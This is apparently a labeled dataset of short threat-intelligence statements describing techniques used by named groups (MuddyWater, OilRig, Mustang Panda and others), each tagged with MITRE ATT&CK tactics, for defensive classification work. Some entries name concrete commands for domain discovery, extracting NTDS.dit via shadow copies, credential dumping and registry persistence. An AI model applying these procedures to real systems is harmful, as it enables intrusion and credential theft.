Magic Hound malware can take a screenshot and upload the file to its C2 server.,['TA0009:Collection']
Magic Hound has created fake LinkedIn and other social media accounts to contact targets and convince them--through messages and voice communications--to open malicious links.,['TA0042:Resource Development']
Magic Hound has captured the user-agent strings from visitors to their phishing sites.,['TA0043:Reconnaissance']
Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.,['TA0001:Initial Access']
Magic Hound has used SMS and email messages with links designed to steal credentials or track victims.,['TA0043:Reconnaissance']
Magic Hound used various social media channels as well as messaging services to spearphish victims.,['TA0001:Initial Access']
"Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.",['TA0007:Discovery']
"Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.",['TA0007:Discovery']
Magic Hound has used quser.exe to identify existing RDP connections.,['TA0007:Discovery']
Magic Hound malware has obtained the victim username and sent it to the C2 server.,['TA0007:Discovery']
"Magic Hound has obtained and used tools like Havij, sqlmap, Metasploit, Mimikatz, and Plink.",['TA0042:Resource Development']
Magic Hound malware has used VBS scripts for execution.,['TA0002:Execution']
"Magic Hound has conducted widespread scanning to identify public-facing systems vulnerable to CVE-2021-44228 in Log4j and ProxyShell vulnerabilities; CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in on-premises MS Exchange Servers; and CVE-2018-13379 in Fortinet FortiOS SSL VPNs.",['TA0043:Reconnaissance']
Magic Hound has used HTTP for C2.,['TA0011:Command and Control']
Magic Hound has acquired Amazon S3 buckets to use in C2.,['TA0042:Resource Development']
Magic Hound has used multiple web shells to gain execution.,['TA0003:Persistence']
Magic Hound has collected names and passwords of all Wi-Fi networks to which a device has previously connected.,['TA0007:Discovery']
Magic Hound has used the command-line interface for code execution.,['TA0002:Execution']
Magic Hound has used a tool to run `cmd /c wmic computersystem get domain` for discovery.,['TA0002:Execution']
Malteiro has obtained credentials from mail clients via NirSoft MailPassView.,['TA0006:Credential Access']
Malteiro has stolen credentials stored in the victim’s browsers via software tool NirSoft WebBrowserPassView.,['TA0006:Credential Access']
Malteiro has the ability to deobfuscate downloaded files prior to execution.,['TA0005:Defense Evasion']
Malteiro has injected Mispadu’s DLL into a process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Malteiro has used scripts encoded in Base64 certificates to distribute malware to victims.,['TA0005:Defense Evasion']
Malteiro targets organizations in a wide variety of sectors via the use of Mispadu banking trojan with the goal of financial theft.,['TA0040:Impact']
Malteiro has relied on users to execute .zip file attachments containing malicious URLs.,['TA0002:Execution']
Malteiro collects the installed antivirus on the victim machine.,['TA0007:Discovery']
Malteiro has sent spearphishing emails containing malicious .zip files.,['TA0001:Initial Access']
"Malteiro collects the machine information, system architecture, the OS version, computer name, and Windows product name.",['TA0007:Discovery']
Malteiro will terminate Mispadu's infection process if the language of the victim machine is not Spanish or Portuguese.,['TA0007:Discovery']
Malteiro has utilized a dropper containing malicious VBS scripts.,['TA0002:Execution']
Metador has encrypted their payloads.,['TA0005:Defense Evasion']
Metador has quickly deleted `cbd.exe` from a compromised host following the successful deployment of their malware.,['TA0005:Defense Evasion']
Metador has downloaded tools and malware onto a compromised system.,['TA0011:Command and Control']
"Metador has used unique malware in their operations, including metaMain and Mafalda.",['TA0042:Resource Development']
Metador has used TCP for C2.,['TA0011:Command and Control']
Metador has used Microsoft's Console Debugger in some of their operations.,['TA0042:Resource Development']
Metador has used HTTP for C2.,['TA0011:Command and Control']
Metador has used the Windows command line to execute commands.,['TA0002:Execution']
Metador has established persistence through the use of a WMI event subscription combined with unusual living-off-the-land binaries such as `cdb.exe`.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Moafee has been known to employ binary padding.,['TA0005:Defense Evasion']
Mofang has compressed the ShimRat executable within malicious email attachments. Mofang has also encrypted payloads before they are downloaded to victims.,['TA0005:Defense Evasion']
Mofang's malicious spearphishing attachments required a user to open the file after receiving.,['TA0002:Execution']
Mofang's spearphishing emails required a user to click the link to connect to a compromised website.,['TA0002:Execution']
"Mofang delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.",['TA0001:Initial Access']
Mofang delivered spearphishing emails with malicious links included.,['TA0001:Initial Access']
Molerats has used forged Microsoft code-signing certificates on malware.,['TA0005:Defense Evasion']
Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.,['TA0006:Credential Access']
Molerats decompresses ZIP files once on the victim machine.,['TA0005:Defense Evasion']
Molerats has delivered compressed executables within ZIP files to victims.,['TA0005:Defense Evasion']
Molerats used executables to download malicious files from different sources.,['TA0011:Command and Control']
"Molerats used various implants, including those built with JS, on target machines.",['TA0002:Execution']
Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.,['TA0002:Execution']
Molerats has sent malicious links via email trick users into opening a RAR archive and running an executable.,['TA0002:Execution']
Molerats has used msiexec.exe to execute an MSI payload.,['TA0005:Defense Evasion']
Molerats used PowerShell implants on target machines.,['TA0002:Execution']
Molerats actors obtained a list of active processes on the victim and sent them to C2 servers.,['TA0007:Discovery']
Molerats saved malicious files within the AppData and Startup folders to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Molerats has created scheduled tasks to persistently run VBScripts.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Molerats has sent phishing emails with malicious Microsoft Word and PDF attachments.,['TA0001:Initial Access']
Molerats has sent phishing emails with malicious links included.,['TA0001:Initial Access']
"Molerats used various implants, including those built with VBScript, on target machines.",['TA0002:Execution']
Moonstone Sleet deployed malware such as YouieLoader capable of capturing victim system browser information.,['TA0007:Discovery']
Moonstone Sleet has distributed a trojanized version of PuTTY software for initial access to victims.,['TA0001:Initial Access']
Moonstone Sleet has deployed ransomware in victim environments.,['TA0040:Impact']
Moonstone Sleet delivered payloads using multiple rounds of obfuscation and encoding to evade defenses and analysis.,['TA0005:Defense Evasion']
Moonstone Sleet developed malicious npm packages for delivery to or retrieval by victims.,['TA0042:Resource Development']
Moonstone Sleet registered domains to develop effective personas for fake companies used in phishing activity.,['TA0042:Resource Development']
"Moonstone Sleet has created email accounts to interact with victims, including for phishing purposes.",['TA0042:Resource Development']
Moonstone Sleet gathered victim email address information for follow-on phishing activity.,['TA0043:Reconnaissance']
Moonstone Sleet embedded payloads in trojanized software for follow-on execution.,['TA0005:Defense Evasion']
Moonstone Sleet has used encrypted payloads within files for follow-on execution and defense evasion.,['TA0005:Defense Evasion']
Moonstone Sleet has gathered information on victim organizations through email and social media interaction.,['TA0043:Reconnaissance']
Moonstone Sleet retrieved a final stage payload from command and control infrastructure during initial installation on victim systems.,['TA0011:Command and Control']
Moonstone Sleet retrieved credentials from LSASS memory.,['TA0006:Credential Access']
"Moonstone Sleet relied on users interacting with malicious files, such as a trojanized PuTTY installer, for initial execution.",['TA0002:Execution']
"Moonstone Sleet has developed custom malware, including a malware delivery mechanism masquerading as a legitimate game.",['TA0042:Resource Development']
Moonstone Sleet delivers encrypted payloads in pieces that are then combined together to form a new portable executable file during installation.,['TA0005:Defense Evasion']
Moonstone Sleet has interacted with victims to gather information via email.,['TA0043:Reconnaissance']
Moonstone Sleet used registry run keys for process execution during initial victim infection.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Moonstone Sleet used scheduled tasks for program execution during initial access to victim machines.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Moonstone Sleet used intermediate loader malware such as YouieLoader and SplitLoader that create malicious services.,['TA0002:Execution']
Moonstone Sleet has created social media accounts to interact with victims.,['TA0042:Resource Development']
Moonstone Sleet delivered various payloads to victims as spearphishing attachments.,['TA0001:Initial Access']
Moonstone Sleet used spearphishing messages containing items such as tracking pixels to determine if users interacted with malicious messages.,['TA0043:Reconnaissance']
Moonstone Sleet has used social media services to spear phish victims to deliver trojainized software.,['TA0001:Initial Access']
Moonstone Sleet has gathered information on victim systems.,['TA0007:Discovery']
Moonstone Sleet has gathered information on victim network configuration.,['TA0007:Discovery']
Moonstone Sleet deployed various malware such as YouieLoader that can perform system user discovery actions.,['TA0007:Discovery']
Moonstone Sleet staged malicious capabilities online for follow-on download by victims or malware.,['TA0042:Resource Development']
Moonstone Sleet registered virtual private servers to host payloads for download.,['TA0042:Resource Development']
Moonstone Sleet used curl to connect to adversary-controlled infrastructure and retrieve additional payloads.,['TA0011:Command and Control']
Moses Staff has used signed drivers from an open source tool called DiskCryptor to evade detection.,['TA0005:Defense Evasion']
Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines.,['TA0005:Defense Evasion']
Moses Staff has used obfuscated web shells in their operations.,['TA0005:Defense Evasion']
Moses Staff has exploited known vulnerabilities in public-facing infrastructure such as Microsoft Exchange Servers.,['TA0001:Initial Access']
Moses Staff has downloaded and installed web shells to following path C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx.,['TA0011:Command and Control']
Moses Staff has collected the administrator username from a compromised host.,['TA0007:Discovery']
"Moses Staff has built malware, such as DCSrv and PyDCrypt, for targeting victims' machines.",['TA0042:Resource Development']
Moses Staff has used batch scripts that can enable SMB on a compromised host.,['TA0008:Lateral Movement']
"Moses Staff collected information about the infected host, including the machine names and OS architecture.",['TA0007:Discovery']
Moses Staff has collected the domain name of a compromised network.,['TA0007:Discovery']
Moses Staff has used the commercial tool DiskCryptor.,['TA0042:Resource Development']
Moses Staff has dropped a web shell onto a compromised system.,['TA0003:Persistence']
"MoustachedBouncer has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware.","['TA0011:Command and Control', 'TA0001:Initial Access']"
MoustachedBouncer has exploited CVE-2021-1732 to execute malware components with elevated rights.,['TA0004:Privilege Escalation']
MoustachedBouncer has used JavaScript to deliver malware hosted on HTML pages.,['TA0002:Execution']
MoustachedBouncer has used plugins to execute PowerShell scripts.,['TA0002:Execution']
MoustachedBouncer has used a reverse proxy tool similar to the GitHub repository revsocks.,['TA0011:Command and Control']
MoustachedBouncer has used plugins to save captured screenshots to `.\AActdata\` on an SMB share.,['TA0009:Collection']
MoustachedBouncer has used plugins to take screenshots on targeted systems.,['TA0009:Collection']
MoustachedBouncer has used malware plugins packed with Themida.,['TA0005:Defense Evasion']
"MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.",['TA0009:Collection']
MuddyWater has used web services including OneHub to distribute remote access tools.,['TA0011:Command and Control']
MuddyWater uses various techniques to bypass UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.,['TA0005:Defense Evasion']
MuddyWater has performed credential dumping with LaZagne.,['TA0006:Credential Access']
"MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.",['TA0005:Defense Evasion']
MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.,['TA0005:Defense Evasion']
"MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.",['TA0002:Execution']
MuddyWater has run a tool that steals passwords saved in victim email.,['TA0006:Credential Access']
"MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.",['TA0006:Credential Access']
MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.,['TA0006:Credential Access']
MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"MuddyWater has decoded base64-encoded PowerShell, JavaScript, and VBScript.",['TA0005:Defense Evasion']
MuddyWater can disable the system's local proxy settings.,['TA0005:Defense Evasion']
MuddyWater has used cmd.exe net user /domain to enumerate domain users.,['TA0007:Discovery']
MuddyWater has used malware that can execute PowerShell scripts via DDE.,['TA0002:Execution']
MuddyWater has used C2 infrastructure to receive exfiltrated data.,['TA0010:Exfiltration']
MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability .,['TA0001:Initial Access']
MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.,['TA0002:Execution']
MuddyWater has exploited the Microsoft Netlogon vulnerability .,['TA0008:Lateral Movement']
MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control .,['TA0011:Command and Control']
"MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords ""Kasper,"" ""Panda,"" or ""ESET.""",['TA0007:Discovery']
MuddyWater has used malware that can upload additional files to the victim’s machine.,['TA0011:Command and Control']
MuddyWater has used JavaScript files to execute its POWERSTATS payload.,['TA0002:Execution']
MuddyWater has performed credential dumping with LaZagne.,['TA0006:Credential Access']
MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.,['TA0006:Credential Access']
MuddyWater has stored a decoy PDF file within a victim's `%temp%` folder.,['TA0009:Collection']
MuddyWater has attempted to get users to open malicious PDF attachment and to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.,['TA0002:Execution']
MuddyWater has distributed URLs in phishing e-mails that link to lure documents.,['TA0002:Execution']
MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.,['TA0005:Defense Evasion']
MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.,['TA0005:Defense Evasion']
"MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.",['TA0011:Command and Control']
"MuddyWater has used a Word Template, Normal.dotm, for persistence.",['TA0003:Persistence']
MuddyWater has used PowerShell for execution.,['TA0002:Execution']
MuddyWater has used malware to obtain a list of running processes on the system.,['TA0007:Discovery']
MuddyWater has developed tools in Python including Out1.,['TA0002:Execution']
MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"MuddyWater has used legitimate applications ScreenConnect, AteraAgent and SimpleHelp to manage systems remotely and move laterally.",['TA0011:Command and Control']
MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.,['TA0005:Defense Evasion']
MuddyWater has used scheduled tasks to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
MuddyWater has used malware that can capture screenshots of the victim’s machine.,['TA0009:Collection']
MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.,['TA0007:Discovery']
MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.,['TA0007:Discovery']
MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.,['TA0001:Initial Access']
MuddyWater has sent targeted spearphishing e-mails with malicious links.,['TA0001:Initial Access']
MuddyWater has used tools to encode C2 communications including Base64 encoding.,['TA0011:Command and Control']
MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.,['TA0005:Defense Evasion']
MuddyWater has used AES to encrypt C2 responses.,['TA0011:Command and Control']
MuddyWater has used malware that can collect the victim’s OS version and machine name.,['TA0007:Discovery']
MuddyWater has used malware to collect the victim’s IP address and domain name.,['TA0007:Discovery']
MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.,['TA0007:Discovery']
MuddyWater has used malware that can collect the victim’s username.,['TA0007:Discovery']
"MuddyWater has used legitimate tools ConnectWise, RemoteUtilities, and SimpleHelp to gain access to the target environment.",['TA0042:Resource Development']
"MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.",['TA0002:Execution']
MuddyWater has used HTTP for C2 communications.,['TA0011:Command and Control']
"MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools.",['TA0042:Resource Development']
MuddyWater has used a custom tool for creating reverse shells.,['TA0002:Execution']
MuddyWater has used malware that leveraged WMI for execution and querying host information.,['TA0002:Execution']
Mustang Panda has encrypted documents with RC4 prior to exfiltration.,['TA0009:Collection']
Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration.,['TA0009:Collection']
Mustang Panda used custom batch scripts to collect files automatically from a targeted system.,['TA0009:Collection']
Mustang Panda has used junk code within their DLL files to hinder analysis.,['TA0005:Defense Evasion']
Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mustang Panda have acquired C2 domains prior to operations.,['TA0042:Resource Development']
Mustang Panda has used an additional filename extension to hide the true file type.,['TA0005:Defense Evasion']
Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.,['TA0042:Resource Development']
Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.,['TA0010:Exfiltration']
Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.,['TA0002:Execution']
"Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.",['TA0005:Defense Evasion']
"Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.",['TA0007:Discovery']
Mustang Panda's PlugX variant has created a hidden folder on USB drives named RECYCLE.BIN to store malicious executables and collected data.,['TA0005:Defense Evasion']
Mustang Panda has downloaded additional executables following the initial infection stage.,['TA0011:Command and Control']
Mustang Panda has used InstallUtil.exe to execute a malicious Beacon stager.,['TA0005:Defense Evasion']
Mustang Panda has stored collected credential files in c:\windows\temp prior to exfiltration. Mustang Panda has also stored documents for exfiltration in a hidden folder on USB drives.,['TA0009:Collection']
Mustang Panda has sent malicious files requiring direct victim interaction to execute.,['TA0002:Execution']
Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.,['TA0002:Execution']
"Mustang Panda has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise PlugX, and a file named `OneDrive.exe` to load a Cobalt Strike payload.",['TA0005:Defense Evasion']
Mustang Panda has used mshta.exe to launch collection scripts.,['TA0005:Defense Evasion']
Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used reg save on the SYSTEM file Registry location to help extract the NTDS.dit file.,['TA0006:Credential Access']
Mustang Panda has delivered initial payloads hidden using archives and encoding measures.,['TA0005:Defense Evasion']
Mustang Panda has used malicious PowerShell scripts to enable execution.,['TA0002:Execution']
Mustang Panda has used tasklist /v to determine active process information.,['TA0007:Discovery']
Mustang Panda has created the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AdobelmdyU to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mustang Panda has installed TeamViewer on targeted systems.,['TA0011:Command and Control']
Mustang Panda has used a customized PlugX variant which could spread through USB connections.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
"Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mustang Panda has searched the victim system for the InstallUtil.exe program and its version.,['TA0007:Discovery']
Mustang Panda has used spearphishing attachments to deliver initial access payloads.,['TA0001:Initial Access']
Mustang Panda has delivered malicious links to their intended targets.,['TA0001:Initial Access']
Mustang Panda has delivered web bugs to profile their intended targets.,['TA0043:Reconnaissance']
Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims.,['TA0042:Resource Development']
Mustang Panda has encrypted C2 communications with RC4.,['TA0011:Command and Control']
Mustang Panda has gathered system information using systeminfo.,['TA0007:Discovery']
Mustang Panda has used ipconfig and arp to determine network configuration information.,['TA0007:Discovery']
Mustang Panda has used netstat -ano to determine network connection information.,['TA0007:Discovery']
Mustang Panda has hosted malicious payloads on DropBox including PlugX.,['TA0042:Resource Development']
Mustang Panda has embedded VBScript components in LNK files to download additional files and automate collection.,['TA0002:Execution']
Mustang Panda has communicated with its C2 via HTTP POST requests.,['TA0011:Command and Control']
Mustang Panda has used DropBox URLs to deliver variants of PlugX.,['TA0011:Command and Control']
"Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.",['TA0002:Execution']
Mustang Panda has executed PowerShell scripts via WMI.,['TA0002:Execution']
Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mustard Tempest operates a global network of compromised websites that redirect into a traffic distribution system to select victims for a fake browser update page.,['TA0042:Resource Development']
"Mustard Tempest has used drive-by downloads for initial infection, often using fake browser updates as a lure.",['TA0001:Initial Access']
Mustard Tempest has injected malicious JavaScript into compromised websites to infect victims via drive-by download.,['TA0042:Resource Development']
Mustard Tempest has deployed secondary payloads and third stage implants to compromised hosts.,['TA0011:Command and Control']
Mustard Tempest has lured users into downloading malware through malicious links in fake advertisements and spearphishing emails.,['TA0002:Execution']
Mustard Tempest has posted false advertisements including for software packages and browser updates in order to distribute malware.,['TA0042:Resource Development']
"Mustard Tempest has used the filename `AutoUpdater.js` to mimic legitimate update files and has also used the Cyrillic homoglyph characters С `` and а ``, to produce the filename `Сhrome.Updаte.zip`.",['TA0005:Defense Evasion']
Mustard Tempest has poisoned search engine results to return fake software updates in order to distribute malware.,['TA0042:Resource Development']
"Mustard Tempest has acquired servers to host second-stage payloads that remain active for a period of either days, weeks, or months.",['TA0042:Resource Development']
Mustard Tempest has sent victims emails containing links to compromised websites.,['TA0001:Initial Access']
Mustard Tempest has used implants to perform system reconnaissance on targeted systems.,['TA0007:Discovery']
"Mustard Tempest has hosted payloads on acquired second-stage servers for periods of either days, weeks, or months.",['TA0042:Resource Development']
"Naikon has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.",['TA0003:Persistence']
Naikon has used DLL side-loading to load malicious DLL's into legitimate executables.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Naikon has used administrator credentials for lateral movement in compromised networks.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Naikon has convinced victims to open malicious attachments to execute malware.,['TA0002:Execution']
Naikon renamed a malicious service taskmgr to appear to be a legitimate version of Task Manager.,['TA0005:Defense Evasion']
"Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables.",['TA0005:Defense Evasion']
Naikon has used the LadonGo scanner to scan target networks.,['TA0007:Discovery']
Naikon has modified a victim's Windows Run registry to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Naikon has used a netbios scanner for remote machine identification.,['TA0007:Discovery']
Naikon has used schtasks.exe for lateral movement in compromised networks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Naikon uses commands such as netsh advfirewall firewall to discover local firewall settings.,['TA0007:Discovery']
Naikon has used malicious e-mail attachments to deliver malware.,['TA0001:Initial Access']
Naikon uses commands such as netsh interface show to discover network interface settings.,['TA0007:Discovery']
Naikon has used WMIC.exe for lateral movement.,['TA0002:Execution']
Nomadic Octopus executed PowerShell in a hidden window.,['TA0005:Defense Evasion']
Nomadic Octopus has used malicious macros to download additional files to the victim's machine.,['TA0011:Command and Control']
Nomadic Octopus as attempted to lure victims into clicking on malicious attachments within spearphishing emails.,['TA0002:Execution']
Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.,['TA0005:Defense Evasion']
Nomadic Octopus has used PowerShell for execution.,['TA0002:Execution']
Nomadic Octopus has targeted victims with spearphishing emails containing malicious attachments.,['TA0001:Initial Access']
Nomadic Octopus used cmd.exe /c within a malicious macro.,['TA0002:Execution']
OilRig used the Plink utility and other tools to create tunnels to C2 servers.,['TA0011:Command and Control']
OilRig has used automated collection.,['TA0009:Collection']
OilRig has used brute force techniques to obtain credentials.,['TA0006:Credential Access']
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,['TA0006:Credential Access']
OilRig has used various types of scripting for execution.,['TA0002:Execution']
OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim.,['TA0005:Defense Evasion']
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,['TA0006:Credential Access']
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,['TA0006:Credential Access']
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. OilRig has also used tool named PICKPOCKET to dump passwords from web browsers.,['TA0006:Credential Access']
OilRig has used DNS for C2 including the publicly available requestbin.net tunneling service.,['TA0011:Command and Control']
A OilRig macro has run a PowerShell command to decode file contents. OilRig has also used certutil to decode base64-encoded files on victims.,['TA0005:Defense Evasion']
"OilRig has run net user, net user /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to get account listings on a victim.",['TA0007:Discovery']
"OilRig has used net group /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to find domain group permission settings.",['TA0007:Discovery']
"OilRig has encrypted and encoded data in its malware, including by using base64.",['TA0005:Defense Evasion']
OilRig has exfiltrated data over FTP separately from its primary C2 channel over DNS.,['TA0010:Exfiltration']
"OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment.","['TA0001:Initial Access', 'TA0003:Persistence']"
OilRig malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.,['TA0011:Command and Control']
OilRig has deleted files associated with their payload after execution.,['TA0005:Defense Evasion']
OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.,['TA0005:Defense Evasion']
OilRig can download remote files onto victims.,['TA0011:Command and Control']
OilRig has used keylogging tools called KEYPUNCH and LONGWATCH.,"['TA0009:Collection', 'TA0006:Credential Access']"
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,['TA0006:Credential Access']
OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access.,['TA0006:Credential Access']
"OilRig has run net user, net user /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to get account listings on a victim.",['TA0007:Discovery']
OilRig has used net localgroup administrators to find local administrators on compromised systems.,['TA0007:Discovery']
"OilRig has delivered macro-enabled documents that required targets to click the ""enable content"" button to execute the payload on the system.",['TA0002:Execution']
OilRig has delivered malicious links to achieve execution on the target system.,['TA0002:Execution']
OilRig has used .doc file extensions to mask malicious executables.,['TA0005:Defense Evasion']
OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.,['TA0007:Discovery']
OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.,['TA0003:Persistence']
OilRig has used net.exe in a script with net accounts /domain to find the password policy of a domain.,['TA0007:Discovery']
OilRig has used tools to identify if a mouse is connected to a targeted system.,['TA0007:Discovery']
"OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.",['TA0002:Execution']
OilRig has run tasklist on a victim's machine.,['TA0007:Discovery']
OilRig has used the Plink utility and other tools to create tunnels to C2 servers.,['TA0011:Command and Control']
OilRig has used reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” on a victim to query the Registry.,['TA0007:Discovery']
OilRig has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment.,['TA0008:Lateral Movement']
OilRig has used Putty to access compromised systems.,['TA0008:Lateral Movement']
OilRig has created scheduled tasks that run a VBScript to execute a payload on victim machines.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
OilRig has a tool called CANDYKING to capture a screenshot of user's desktop.,['TA0009:Collection']
OilRig has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts.,['TA0001:Initial Access']
OilRig has sent spearphising emails with malicious links to potential victims.,['TA0001:Initial Access']
OilRig has used LinkedIn to send spearphishing links.,['TA0001:Initial Access']
OilRig has used macros to verify if a mouse is connected to a compromised machine.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
OilRig has run hostname and systeminfo on a victim.,['TA0007:Discovery']
OilRig has run ipconfig /all on a victim.,['TA0007:Discovery']
OilRig has used netstat -an on a victim to get a listing of network connections.,['TA0007:Discovery']
OilRig has run whoami on a victim.,['TA0007:Discovery']
OilRig has used sc query on a victim to gather information about services.,['TA0007:Discovery']
OilRig has used compromised credentials to access other systems on a victim network.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
OilRig has used VBScript macros for execution on compromised hosts.,['TA0002:Execution']
OilRig has used HTTP for C2.,['TA0011:Command and Control']
"OilRig has used web shells, often to maintain access to a victim network.",['TA0003:Persistence']
OilRig has used macros to deliver malware such as QUADAGENT and OopsIE. OilRig has used batch scripts.,['TA0002:Execution']
OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager.,['TA0006:Credential Access']
OilRig has used WMI for execution.,['TA0002:Execution']
"Orangeworm has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.",['TA0008:Lateral Movement']
Orangeworm has used HTTP for C2.,['TA0011:Command and Control']
PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access.,"['TA0009:Collection', 'TA0006:Credential Access']"
PLATINUM has sometimes used drive-by attacks against vulnerable browser plugins.,['TA0001:Initial Access']
PLATINUM has leveraged a zero-day vulnerability to escalate privileges.,['TA0004:Privilege Escalation']
PLATINUM has transferred files using the Intel® Active Management Technology Serial-over-LAN channel.,['TA0011:Command and Control']
PLATINUM has used several different keyloggers.,"['TA0009:Collection', 'TA0006:Credential Access']"
